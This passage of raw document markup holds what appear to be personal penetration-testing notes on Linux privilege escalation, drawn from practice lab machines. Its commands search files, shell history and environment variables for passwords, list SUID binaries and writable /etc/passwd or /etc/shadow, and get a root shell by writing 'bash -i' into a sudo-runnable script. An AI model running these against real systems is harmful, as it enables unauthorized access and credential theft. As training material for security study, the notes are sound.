    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000015AB">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">ifconfig</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> (or </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">ip a</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000015AC">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">route </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">or </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">routel </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">(display network routing tables)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000015AD">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">find . -type f -exec grep -i -I "PASSWORD=" {} /dev/null \;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000015AE">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">locate pass | more</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000015AF">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000015B0">
      <w:pPr>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">More Basic System Enumeration (from the </w:t>
      </w:r>
      <w:hyperlink r:id="rId424">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:b w:val="1"/>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">Solstice</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">PG Play):</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000015B1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1346"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr/>
      </w:pPr>
      <w:hyperlink r:id="rId425">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paid version of writeup from Medium but you can just use freedium to get it for free</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000015B2">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1346"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr/>
      </w:pPr>
      <w:hyperlink r:id="rId426">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free version from freedium</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000015B3">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000015B4">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">sudo -l (check what commands current user can run with sudo privilege)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000015B5">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">cat /etc/crontab (cronjobs running)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000015B6">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">cat .bash_history (passwords saved in history)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000015B7">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">env (passwords saved in environment variable)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000015B8">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">uname -ar (kernel exploits)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000015B9">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">cat /etc/*-release (kernel exploits)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000015BA">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">ss -tulnp (check for any potential services running)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000015BB">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">getcap -r / 2&gt;/dev/null (capabilities)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000015BC">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">find / -perm -u=s -type f 2&gt;/dev/null (SUID)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000015BD">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">find / -perm -g=s -type f 2&gt;/dev/null (SGID)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000015BE">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">sudo --version (public exploits)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000015BF">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">id (check for docker and lxd group)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000015C0">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1094"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">In the </w:t>
      </w:r>
      <w:hyperlink r:id="rId427">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">Pwned1</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">PG Play, we saw Docker group and exploited it that way. Look at the "Docker" section</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000015C1">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">ls -la /etc/passwd (writable /etc/passwd)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000015C2">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">ls -la /etc/shadow (writeable /etc/shadow)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000015C3">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">ps aux | grep -i "root" --color=auto</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000015C4">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000015C5">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">cd /home</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000015C6">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">grep -rnH "password" .</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000015C7">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000015C8">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">cd /var/www/</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000015C9">
      <w:pPr>
        <w:rPr>
          <w:b w:val="1"/>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">grep -rnH "password" .</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000015CA">
      <w:pPr>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000015CB">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000015CC">
      <w:pPr>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">How to get root shell from running script:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000015CD">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="308"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">If you are able to run a file as root, then you can check to see if you are able to edit the file. If so, put this code inside the file so that you can access bash as root:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000015CE">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="308"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">bash -i</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000015CF">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="308"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Once you put it inside, make sure you can execute file:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000015D0">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="308"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">chmod +x [file_name]</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000015D1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="308"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Now run the file:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000015D2">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="308"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">sudo ./[file_name]</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000015D3">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000015D4">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000015D5">
      <w:pPr>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Finding mounted drives (ex. Password on USB drive like in Mirai HTB)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000015D6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1433"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Running </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">df -h </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">outputs a list of the machine's partitions</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000015D7">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000015D8">
      <w:pPr>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Switching users:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000015D9">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="215"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">su -</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000015DA">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="215"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Switch to root (by default sometimes)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000015DB">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="215"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
